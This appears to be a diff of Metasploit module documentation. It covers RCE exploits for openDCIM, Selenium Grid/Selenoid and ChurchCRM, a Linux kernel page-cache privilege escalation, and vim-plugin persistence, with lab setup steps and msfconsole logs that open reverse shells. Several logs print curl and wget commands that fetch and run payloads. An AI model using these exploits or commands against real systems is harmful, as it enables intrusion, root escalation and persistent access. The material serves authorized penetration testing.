HTTP Basic Auth password. Leave empty for deployments using Apache `SetEnv REMOTE_USER`.
## Scenarios
### openDCIM 24.01 on Ubuntu - Command Shell (Target 0)
```
msf6 > use exploit/linux/http/opendcim_install_sqli_rce
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set RPORT 18091
RPORT => 18091
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set HttpUsername dcim
HttpUsername => dcim
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set HttpPassword dcim
HttpPassword => dcim
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set LHOST 192.168.64.1
LHOST => 192.168.64.1
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(linux/http/opendcim_install_sqli_rce) > check
[*] install.php is accessible, testing time-based SQL injection
[*] Test 1/3: SLEEP(5)
[*] Elapsed time: 5.1 seconds.
[*] Test 2/3: SLEEP(4)
[*] Elapsed time: 4.0 seconds.
[*] Test 3/3: SLEEP(6)
[*] Elapsed time: 6.1 seconds.
[+] 127.0.0.1:18091 - The target appears to be vulnerable. Successfully tested SQL injection (3/3 delay checks passed).
msf6 exploit(linux/http/opendcim_install_sqli_rce) > exploit
[*] Started reverse TCP handler on 192.168.64.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Successfully tested SQL injection (3/3 delay checks passed).
[*] Performing LORI attack (LDAP Override Remote Injection)
[*] Triggering exec() via report_network_map.php
[*] Restoring original configuration
[+] Configuration restored successfully.
[*] Command shell session 1 opened (192.168.64.1:4444 -> 192.168.64.3:45678) at 2026-02-28 15:00:00 +0100
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
### openDCIM 24.01 on Ubuntu - Meterpreter via CmdStager (Target 1)
```
msf6 > use exploit/linux/http/opendcim_install_sqli_rce
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set RPORT 18091
RPORT => 18091
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set HttpUsername dcim
HttpUsername => dcim
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set HttpPassword dcim
HttpPassword => dcim
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set LHOST 192.168.64.1
LHOST => 192.168.64.1
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set target 1
target => 1
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/opendcim_install_sqli_rce) > exploit
[*] Started reverse TCP handler on 192.168.64.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Successfully tested SQL injection (3/3 delay checks passed).
[*] Executing command stager
[*] Sending stager progress: 100.00% (250/250 bytes)
[*] Restoring original configuration
[+] Configuration restored successfully.
[*] Sending stage (3045380 bytes) to 192.168.64.3
[*] Meterpreter session 1 opened (192.168.64.1:4444 -> 192.168.64.3:54321) at 2026-02-28 15:05:00 +0100
meterpreter > getuid
Server username: www-data
```
### openDCIM with SetEnv REMOTE_USER (No Basic Auth)
```
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set RPORT 80
RPORT => 80
msf6 exploit(linux/http/opendcim_install_sqli_rce) > unset HttpUsername
Unsetting HttpUsername...
msf6 exploit(linux/http/opendcim_install_sqli_rce) > unset HttpPassword
Unsetting HttpPassword...
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(linux/http/opendcim_install_sqli_rce) > exploit
[*] Started reverse TCP handler on 192.168.1.50:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Successfully tested SQL injection (3/3 delay checks passed).
[*] Performing LORI attack (LDAP Override Remote Injection)
[*] Triggering exec() via report_network_map.php
[*] Restoring original configuration
[+] Configuration restored successfully.
[*] Command shell session 1 opened (192.168.1.50:4444 -> 192.168.1.100:54321) at 2026-02-28 15:10:00 +0100
```
@@ -0,0 +1,197 @@
## Vulnerable Application
Selenium Grid and Selenoid expose a WebDriver API that allows creating browser sessions
with arbitrary capabilities. When deployed without authentication (the default for both),
an attacker can achieve remote code execution through two browser-specific techniques:
**Chrome (binary override):** The `goog:chromeOptions` binary field can be set to an
arbitrary executable such as `/usr/bin/python3`, since ChromeDriver does not validate it.
This was fixed in Selenium Grid 4.11.0 via the stereotype capabilities merge. All Selenoid
versions remain vulnerable.
**Firefox (profile handler):** A custom profile containing a malicious MIME handler that maps
`application/sh` to `/bin/sh` can be injected via `moz:firefoxOptions`. Navigating to a
`data:` URI with that content type triggers shell execution. This technique has never been
patched and works on all Selenium Grid versions including the latest release (4.40.0 at the
time of writing). This was originally reported in
[SeleniumHQ/selenium#9526](https://github.com/SeleniumHQ/selenium/issues/9526) in May 2021.
The module auto-detects available browsers and selects the best attack vector. Firefox is
preferred as it works on all Grid versions.
The default Docker images run as `seluser`/`selenium` with passwordless sudo, allowing
trivial privilege escalation to root.
The vulnerability affects:
* Selenium Grid < 4.11.0 with Chrome nodes (binary override)
* Selenium Grid - all versions with Firefox nodes (profile handler, unpatched)
* Selenoid - all versions with Chrome or Firefox (project archived December 2024)
This module was successfully tested on:
* selenium/standalone-chrome:4.10.0 on Ubuntu 24.04 (Chrome binary override)
* selenium/standalone-firefox:4.10.0 on Ubuntu 24.04 (Firefox profile handler)
* selenium/standalone-firefox:latest (4.40.0) on Ubuntu 24.04 (Firefox profile handler)
* Selenoid 1.11.3 with selenoid/chrome:128.0 on Ubuntu 24.04 (Chrome binary override)
### Installation (Selenium Grid - Firefox)
1. `docker pull selenium/standalone-firefox:latest`
2. `docker run -d -p 4444:4444 --shm-size="2g" selenium/standalone-firefox:latest`
### Installation (Selenium Grid - Chrome)
1. `docker pull selenium/standalone-chrome:4.10.0`
2. `docker run -d -p 4444:4444 --shm-size="2g" selenium/standalone-chrome:4.10.0`
### Installation (Selenoid)
1. Create `browsers.json`:
```json
{
"chrome": {
"default": "128.0",
"versions": {
"128.0": {
"image": "selenoid/chrome:128.0",
"port": "4444",
"path": "/"
}
}
}
}
```
2. `docker pull selenoid/chrome:128.0`
3. Start Selenoid:
```
docker run -d -p 4444:4444 \
-e DOCKER_API_VERSION=1.44 \
-v $(pwd)/browsers.json:/etc/selenoid/browsers.json:ro \
-v /var/run/docker.sock:/var/run/docker.sock \
aerokube/selenoid:latest-release
```
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/selenium_greed_rce`
4. Do: `set RHOSTS <rhost>`
5. Do: `set LHOST <lhost>`
6. Do: `run`
7. You should get a session
## Options
### BROWSER
Browser to exploit. Default is `auto` which detects available browsers and picks the
best vector (Firefox preferred, Chrome fallback). Can be set to `firefox` or `chrome`
to force a specific browser.
## Scenarios
### Firefox (auto-detected) - selenium/standalone-firefox:4.40.0 on Ubuntu 24.04
```
msf6 > use exploit/linux/http/selenium_greed_rce
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf6 exploit(linux/http/selenium_greed_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(linux/http/selenium_greed_rce) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(linux/http/selenium_greed_rce) > set LPORT 4480
LPORT => 4480
msf6 exploit(linux/http/selenium_greed_rce) > set TARGET 1
TARGET => 1
msf6 exploit(linux/http/selenium_greed_rce) > set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
PAYLOAD => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/selenium_greed_rce) > set FETCH_SRVPORT 9100
FETCH_SRVPORT => 9100
msf6 exploit(linux/http/selenium_greed_rce) > run
[*] Started reverse TCP handler on 172.17.0.1:4480
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Selenium Grid 4.40.0 with Firefox (all versions vulnerable to profile handler)
[*] Auto-selected Firefox (profile handler - works on all Grid versions)
[*] Creating Firefox session with malicious profile...
[*] Session created: 74d019ac-e7eb-4604-9c48-80baf43da5d9
[*] Navigating to data: URI to trigger handler...
[*] Sending stage (3090404 bytes) to 172.17.0.5
[+] Deleted /tmp/EUeiCPJfsLF
[*] Meterpreter session 1 opened (172.17.0.1:4480 -> 172.17.0.5:37004)
meterpreter > getuid
Server username: seluser
meterpreter > sysinfo
Computer : 56a95484dc83
OS : Linux 6.14.0-123037-tuxedo
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
### Chrome (auto-detected) - selenium/standalone-chrome:4.10.0 on Ubuntu 24.04
```
msf6 > use exploit/linux/http/selenium_greed_rce
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf6 exploit(linux/http/selenium_greed_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(linux/http/selenium_greed_rce) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(linux/http/selenium_greed_rce) > set LPORT 4481
LPORT => 4481
msf6 exploit(linux/http/selenium_greed_rce) > run
[*] Started reverse TCP handler on 172.17.0.1:4481
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Selenium Grid 4.10.0 with Chrome (vulnerable to binary override)
[*] Auto-selected Chrome (binary override)
[*] Sending Chrome session request with binary override...
[*] Sending stage (23404 bytes) to 172.17.0.7
[*] Meterpreter session 1 opened (172.17.0.1:4481 -> 172.17.0.7:50292)
meterpreter > getuid
Server username: seluser
meterpreter > sysinfo
Computer : 90f5a4eefae5
OS : Linux 6.14.0-123037-tuxedo
Architecture : x64
Meterpreter : python/linux
meterpreter >
```
### Selenoid 1.11.3 - selenoid/chrome:128.0 on Ubuntu 24.04
```
msf6 > use exploit/linux/http/selenium_greed_rce
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf6 exploit(linux/http/selenium_greed_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(linux/http/selenium_greed_rce) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(linux/http/selenium_greed_rce) > set LPORT 4453
LPORT => 4453
msf6 exploit(linux/http/selenium_greed_rce) > run
[*] Started reverse TCP handler on 172.17.0.1:4453
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Selenoid 1.11.3 built at 2024-05-25_12:34:40PM (all versions vulnerable)
[*] Auto-selected Chrome (binary override)
[*] Sending Chrome session request with binary override...
[*] Sending stage (23408 bytes) to 172.17.0.10
[*] Meterpreter session 1 opened (172.17.0.1:4453 -> 172.17.0.10:42984)
meterpreter > getuid
Server username: selenium
meterpreter > sysinfo
Computer : 669a719f93da
OS : Linux 6.14.0-123037-tuxedo
Architecture : x64
Meterpreter : python/linux
meterpreter >
```
@@ -0,0 +1,80 @@
## Vulnerable Application
CVE-2026-31431 is a logic flaw in the Linux kernel's authencesn AEAD template that, when reached via the
AF_ALG socket interface combined with splice(), allows an unprivileged local user to perform a controlled
4-byte write into the page cache of any readable file. Because the corrupted pages are never marked dirty, the
on-disk file is unchanged but the in-memory version is immediately visible system-wide, enabling local
privilege escalation by injecting shellcode into the page cache of a setuid-root binary such as /usr/bin/su.
The vulnerability was introduced by an in-place optimization in algif_aead.c (commit 72548b093ee3, 2017) and
affects essentially all major Linux distributions shipped since then until the fix in commit a664bf3d603d.
## Verification Steps
1. Obtain a session on an affected Linux host
2. Set the PAYLOAD and related datastore options
3. Run the exploit
## Options
N/A
## Scenarios
### Ubuntu 24.04 x64
```
msf exploit(multi/ssh/sshexec) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] 192.168.159.132:22 - Sending stager...
[*] Command Stager progress - 46.74% done (402/860 bytes)
[*] Sending stage (3090404 bytes) to 192.168.159.132
[*] Meterpreter session 24 opened (192.168.159.128:4444 -> 192.168.159.132:38262) at 2026-04-30 14:50:33 -0400
[!] Timed out while waiting for command to return
[*] Command Stager progress - 100.00% done (860/860 bytes)
meterpreter > getuid
Server username: smcintyre
meterpreter > sysinfo
Computer : ubuntu2404
OS : Ubuntu 24.04 (Linux 6.8.0-79-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > background
[*] Backgrounding session 24...
msf exploit(multi/ssh/sshexec) > use exploit/linux/local/cve_2026_31431_copy_fail
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/local/cve_2026_31431_copy_fail) > set SESSION -1
SESSION => -1
msf exploit(linux/local/cve_2026_31431_copy_fail) > set VERBOSE true
VERBOSE => true
msf exploit(linux/local/cve_2026_31431_copy_fail) > set LPORT 5555
LPORT => 5555
msf exploit(linux/local/cve_2026_31431_copy_fail) > exploit
[*] Command to run on remote host: curl -so ./JVvusljc http://192.168.159.128:8080/dau8JtEFWcUux21CRy4HUQ;chmod +x ./JVvusljc;./JVvusljc&
[*] Fetch handler listening on 192.168.159.128:8080
[*] HTTP server started
[*] Adding resource /dau8JtEFWcUux21CRy4HUQ
[*] Started reverse TCP handler on 192.168.159.128:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using 'python3' on the remote target.
[+] The exploit socket has been created, encryption primitives are available.
[*] Triggering the vulnerability using Python...
[+] The target is vulnerable.
[*] Triggering the vulnerability using Python...
[*] Client 192.168.159.132 requested /dau8JtEFWcUux21CRy4HUQ
[*] Sending payload to 192.168.159.132 (curl/8.5.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 192.168.159.132
[*] Meterpreter session 25 opened (192.168.159.128:5555 -> 192.168.159.132:48976) at 2026-04-30 14:51:18 -0400
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : ubuntu2404
OS : Ubuntu 24.04 (Linux 6.8.0-79-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
@@ -0,0 +1,99 @@
## Vulnerable Application
This module creates a VIM Plugin which executes a payload on VIM startup.
## Verification Steps
1. Install the application if needed
2. Start msfconsole
3. Get a shell on a linux computer with vim installed
4. Do: `use exploit/linux/persistence/vim_persistence`
5. Do: `run`
6. Start `vim` on the remote computer
7. You should get a shell.
## Options
### NAME
Name of the extension. Defaults to random.
## Scenarios
### vim 9.1.2141 on Kali 2026.1
```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set srvport 8082
srvport => 8082
resource (/root/.msf4/msfconsole.rc)> set uripath l
uripath => l
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4446
lport => 4446
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4446
[*] Using URL: http://1.1.1.1:8082/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO b1ULF8bg --no-check-certificate http://1.1.1.1:8082/l; chmod +x b1ULF8bg; ./b1ULF8bg& disown
msf exploit(multi/script/web_delivery) >
[*] 1.1.1.1 web_delivery - Delivering Payload (250 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 1.1.1.1:35126) at 2026-03-30 08:43:36 -0400
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: h00die
meterpreter > sysinfo
Computer : h00die-kali
OS : Debian (Linux 6.18.12+kali-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/script/web_delivery) > use exploit/linux/persistence/vim_persistence
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/persistence/vim_persistence) > set session 1
session => 1
msf exploit(linux/persistence/vim_persistence) > exploit
[*] Command to run on remote host: curl -so ./mCslKCWV http://1.1.1.1:8080/h21lOsiTyFK6CgBlUqDgZQ;chmod +x ./mCslKCWV;./mCslKCWV&
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /h21lOsiTyFK6CgBlUqDgZQ
[*] Started reverse TCP handler on 1.1.1.1:4444
msf exploit(linux/persistence/vim_persistence) > [*] Running automatic check ("set AutoCheck false" to disable)
[!] Payloads in /tmp will only last until reboot, you may want to choose elsewhere.
[!] The service is running, but could not be validated. VIM is installed
[*] Writing plugin to /root/.vim/plugin/UAxJbJuMy.vim
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/h00die-kali_20260330.4754/h00die-kali_20260330.4754.rc
```
Open vim
```
[*] Client 1.1.1.1 requested /h21lOsiTyFK6CgBlUqDgZQ
[*] Sending payload to 1.1.1.1 (curl/8.18.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 1.1.1.1
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 1.1.1.1:40448) at 2026-03-30 08:48:02 -0400
```
@@ -0,0 +1,516 @@
## Vulnerable Application
ChurchCRM is an open-source, PHP-based CRM designed to help churches manage members, groups, events, and finances.
### Description
This module exploits an authenticated Remote Code Execution (RCE) vulnerability in ChurchCRM versions prior to 6.2.0. The vulnerability, tracked as [CVE-2025-68109](https://nvd.nist.gov/vuln/detail/CVE-2025-68109), resides in the database restoration functionnality.
The application fails to properly validate the integrity and format of uploaded backup files during the restoration process. Specifically, even when file is identified as malfomed or invalid, it is still writen to a web-accessible directory.
An autenticated attacker can leverage this behavior to upload a malicious `.htaccess` file to reconfigure the server's directory permissions, followed by a PHP payload. This allow for the execution of arbitrary code under the context of the web server user.
- Project Homepage: https://churchcrm.io/
- Source Code: https://github.com/ChurchCRM/CRM
- Vulnerability Reference: https://github.com/ChurchCRM/CRM/security/advisories/GHSA-pqm7-g8px-9r77
### Versions tested
- ChurchCRM 6.2.0 (vulnerable)
- ChurchCRM 6.1.0 (vulnerable)
- ChurchCRM 6.0.2 (vulnerable)
### Docker installation
To quickly set up a testing environment for this module, you can use the following Docker configuration. This setup mimics a fresh installation of **ChurchCRM** on an Ubuntu-based LAMP stack and setup the admin user.
- Create a file named `Dockerfile` with the following content:
```Dockerfile
FROM ubuntu:22.04
ENV DEBIAN_FRONTEND=noninteractive
ARG DB_NAME=churchcrm
ARG DB_USER=churchcrm
ARG DB_PASS=churchcrm_password
ARG CHURCHCRM_VERSION=6.8.0
ARG ADMIN_PASS
RUN apt-get update && apt-get install -y software-properties-common \
&& add-apt-repository ppa:ondrej/php -y \
&& apt-get update \
&& apt-get update && apt-get install -y \
apache2 mariadb-server mariadb-client php8.4 php-bcmath \
php-cli php-curl php-dev php-gd php-intl php-mbstring \
php-mysql php-soap php-xml php-zip unzip curl gawk \
&& apt-get clean
ENV VERSION=${CHURCHCRM_VERSION}
WORKDIR /tmp
RUN curl -L -o churchcrm.zip https://github.com/ChurchCRM/CRM/releases/download/$VERSION/ChurchCRM-$VERSION.zip \
&& unzip churchcrm.zip \
&& mv churchcrm /var/www/html/ \
&& mkdir -p /var/www/html/churchcrm/Images/Family \
&& mkdir -p /var/www/html/churchcrm/Images/Person \
&& chown -R www-data:www-data /var/www/html/churchcrm \
&& rm churchcrm.zip
RUN printf "file_uploads = On\n\
allow_url_fopen = On\n\
short_open_tag = On\n\
memory_limit = 256M\n\
upload_max_filesize = 100M\n\
max_execution_time = 360" > /etc/php/8.4/apache2/conf.d/99-churchcrm.ini
RUN echo '<VirtualHost *:80>\n\
DocumentRoot /var/www/html/churchcrm/\n\
<Directory /var/www/html/churchcrm/>\n\
Options -Indexes +FollowSymLinks\n\
AllowOverride All\n\
Require all granted\n\
</Directory>\n\
ErrorLog ${APACHE_LOG_DIR}/error.log\n\
CustomLog ${APACHE_LOG_DIR}/access.log combined\n\
</VirtualHost>' > /etc/apache2/sites-available/churchcrm.conf
RUN a2enmod rewrite && a2dissite 000-default.conf && a2ensite churchcrm.conf
COPY start.sh /start.sh
RUN sed -i 's/\r$//' /start.sh && chmod +x /start.sh
ENV DB_NAME=${DB_NAME}
ENV DB_USER=${DB_USER}
ENV DB_PASS=${DB_PASS}
ENV ADMIN_PASS=${ADMIN_PASS}
EXPOSE 80
CMD ["/start.sh"]
```
- Create a file named `docker-compose.yml` in the same directory:
```yaml
services:
churchcrm:
build:
context: .
args:
- CHURCHCRM_VERSION=6.2.0
- DB_NAME=churchcrm
- DB_USER=churchcrm
- DB_PASS=churchcrm_password
- ADMIN_PASS=AdminPassword123
container_name: churchcrm_app
image: churchcrm-image:latest
ports:
- "80:80"
volumes:
- churchcrm_db_data:/var/lib/mysql
- churchcrm_web_data:/var/www/html/churchcrm
restart: unless-stopped
volumes:
churchcrm_db_data:
churchcrm_web_data:
```
- Create a file named `start.sh` in the same directory too :
```bash
#!/bin/bash
set -e
service mariadb start
mariadb -e "CREATE DATABASE IF NOT EXISTS ${DB_NAME} DEFAULT CHARACTER SET utf8;"
mariadb -e "GRANT ALL ON ${DB_NAME}.* TO \"${DB_USER}\"@\"localhost\" IDENTIFIED BY \"${DB_PASS}\";"
mariadb -e "FLUSH PRIVILEGES;"
BASE_PASSWORD="changeme"
LOG_URL="http://localhost/session/begin"
LOG_USERNAME="admin"
LOG_PASSWORD="$BASE_PASSWORD"
COOKIE_FILENAME="/tmp/cookie.txt"
function get_cookie() {
local cookie_file=$1
curl -s "$LOG_URL" \
-H "Content-Type: application/x-www-form-urlencoded" \
-L -c "$cookie_file" \
--data "User=$LOG_USERNAME&Password=$LOG_PASSWORD" > /dev/null
}
function get_csrf_token() {
local URL=$1
local result=$(curl -s -L -b "$COOKIE_FILENAME" "$URL")
echo "$result" | grep -oP 'name="csrf_token" value="\K[^"]+'
}
function change_password() {
local URL='http://localhost/v2/user/current/changepassword'
local OLD_PASSWORD=$1
local NEW_PASSWORD=$2
local CSRF=$(get_csrf_token "$URL")
curl -s "$URL" \
-H "Content-Type: application/x-www-form-urlencoded" \
-L -b "$COOKIE_FILENAME" \
--data "csrf_token=$CSRF&OldPassword=$OLD_PASSWORD&NewPassword1=$NEW_PASSWORD&NewPassword2=$NEW_PASSWORD&Submit=Save" \
> /dev/null
}
(
until curl --output /dev/null --silent --head --fail http://localhost/; do
echo "En attente d'Apache..."
sleep 2
done
echo "Initialisation du setup ChurchCRM..."
curl -s "http://localhost/setup/" -X POST \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "DB_SERVER_NAME=localhost&DB_SERVER_PORT=3306&DB_NAME=${DB_NAME}&DB_USER=${DB_USER}&DB_PASSWORD=${DB_PASS}&ROOT_PATH=/&URL=http://localhost/"
echo "Changement du mot de passe admin..."
get_cookie "$COOKIE_FILENAME"
change_password "$BASE_PASSWORD" "$ADMIN_PASS"
rm -f "$COOKIE_FILENAME"
echo "Configuration terminée avec succès."
) &
exec apachectl -D FOREGROUND
```
Then, run the following command to start the vulnerable application :
```bash
docker compose build --build-arg CHURCHCRM_VERSION=VERSION_YOU_WANT --build-arg ADMIN_PASS='CUSTOMPASSWORD' && docker compose up -d
```
Where
- `VERSION_YOU_WANT` is the version of ChurchCRM you want to test. To test the vulnerability, you can use version `6.2.0` which is the version tested in the PoC.
- `ADMIN_PASS` is the password of the administrator account. Be aware that this password require a size of at least 6 characters. By default the password is `AdminPassword123`.
Once started, the application will be available at `http://<your-ip>/`.
### Linux installation
If you prefer to set up ChurchCRM on a dedicated Linux host or an LXD container, you can use the official installation script present in the [source code](https://github.com/ChurchCRM/CRM/archive/refs/tags/5.2.0.zip).
> [!WARNING] By default, the installer fetches the latest version of ChurchCRM. To test this specific exploit, you **must** force the script to use the version you want.
For example, if you want to test version `6.2.0`, you can modify the `VERSION` variable in the installation script as follows :
```shell
VERSION=$(eval "$VERSION_CMD") #112
# Become
VERSION="6.2.0"
```
The application should also be available at `http://<your-ip>/`. You will need to manualy setup the admin account's password in order to have access to the restore database functionnality.
## Verification step
1. Start `msfconsole`
2. `use exploit/multi/http/churchcrm_db_restore_rce`
3. Set the target `RHOSTS` and `RPORT` according to the target Host and the port which ChurchCRM's service is running.
4. Set your host and port for the reverse shell connection at `LHOST` and `LPORT`.
5. Set the `TARGETURI` which represent the base path that lead to the ChurchCRM page.
6. Set the `USERNAME` and `PASSWORD` of the admin account.
7. Set the target (0 for Linux, 1 for PHP (In-Memory), 2 for PHP (Fetch)).
8. Set the payload you want to use.
9. Run the exploit with `run`.
## Scenarios
### Linux target : ChurchCRM 6.2.0 on Ubuntu 22.04 LTS (Docker Image)
```bash
msf > use exploit/multi/http/churchcrm_db_restore_rce
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf exploit(multi/http/churchcrm_db_restore_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf exploit(multi/http/churchcrm_db_restore_rce) > set LHOST 172.18.0.1
LHOST => 172.18.0.1
msf exploit(multi/http/churchcrm_db_restore_rce) > set target 0
target => 0
msf exploit(multi/http/churchcrm_db_restore_rce) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf exploit(multi/http/churchcrm_db_restore_rce) > set USERNAME admin
USERNAME => admin
msf exploit(multi/http/churchcrm_db_restore_rce) > set PASSWORD 'Password123!'
PASSWORD => Password123!
msf exploit(multi/http/churchcrm_db_restore_rce) > show options
Module options (exploit/multi/http/churchcrm_db_restore_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD Password123! yes Password for the admin account
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, http, socks5, socks5h
RHOSTS 127.0.0.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SRVSSL false no Negotiate SSL/TLS for local server connections
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Base path
URIPATH no The URI to use for this exploit (default is random)
USERNAME admin yes Username for the admin account
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on
all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.18.0.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux/unix Command (CmdStager)
View the full module info with the info, or info -d command.
msf exploit(multi/http/churchcrm_db_restore_rce) > check
[*] Found ChurchCRM version: 6.2.0
[*] 127.0.0.1:80 - The target appears to be vulnerable. Vulnerable version 6.2.0 detected via CRM-VERSION header.
msf exploit(multi/http/churchcrm_db_restore_rce) > run
[*] Started reverse TCP handler on 172.18.0.1:4444
[*] Getting the session cookie
[+] The session cookie has been received
[*] Uploading the file : .htaccess
[+] The file have been uploaded successfully
[*] Uploading the file : basmIMy.php
[+] The file have been uploaded successfully
[*] Trying to execute the payload
[*] Command Stager progress - 59.76% done (499/835 bytes)
[*] Sending stage (3090404 bytes) to 172.18.0.2
[+] Deleted .htaccess
[+] Deleted basmIMy.php
[*] Meterpreter session 1 opened (172.18.0.1:4444 -> 172.18.0.2:58848) at 2026-03-06 09:23:07 +0100
[*] Command Stager progress - 100.00% done (835/835 bytes)
[+] Payload successfully executed
meterpreter > getpid
Current pid: 259
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : 01209387574a
OS : Ubuntu 22.04 (Linux 6.18.13-arch1-1)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
### PHP (In-Memory) target : ChurchCRM 6.0.2 on Ubuntu 22.04 LTS (Docker Image)
```bash
msf > use exploit/multi/http/churchcrm_db_restore_rce
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf exploit(multi/http/churchcrm_db_restore_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf exploit(multi/http/churchcrm_db_restore_rce) > set LHOST 172.18.0.1
LHOST => 172.18.0.1
msf exploit(multi/http/churchcrm_db_restore_rce) > set target 1
target => 1
msf exploit(multi/http/churchcrm_db_restore_rce) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/http/churchcrm_db_restore_rce) > set USERNAME admin
USERNAME => admin
msf exploit(multi/http/churchcrm_db_restore_rce) > set PASSWORD 'Password123!'
PASSWORD => Password123!
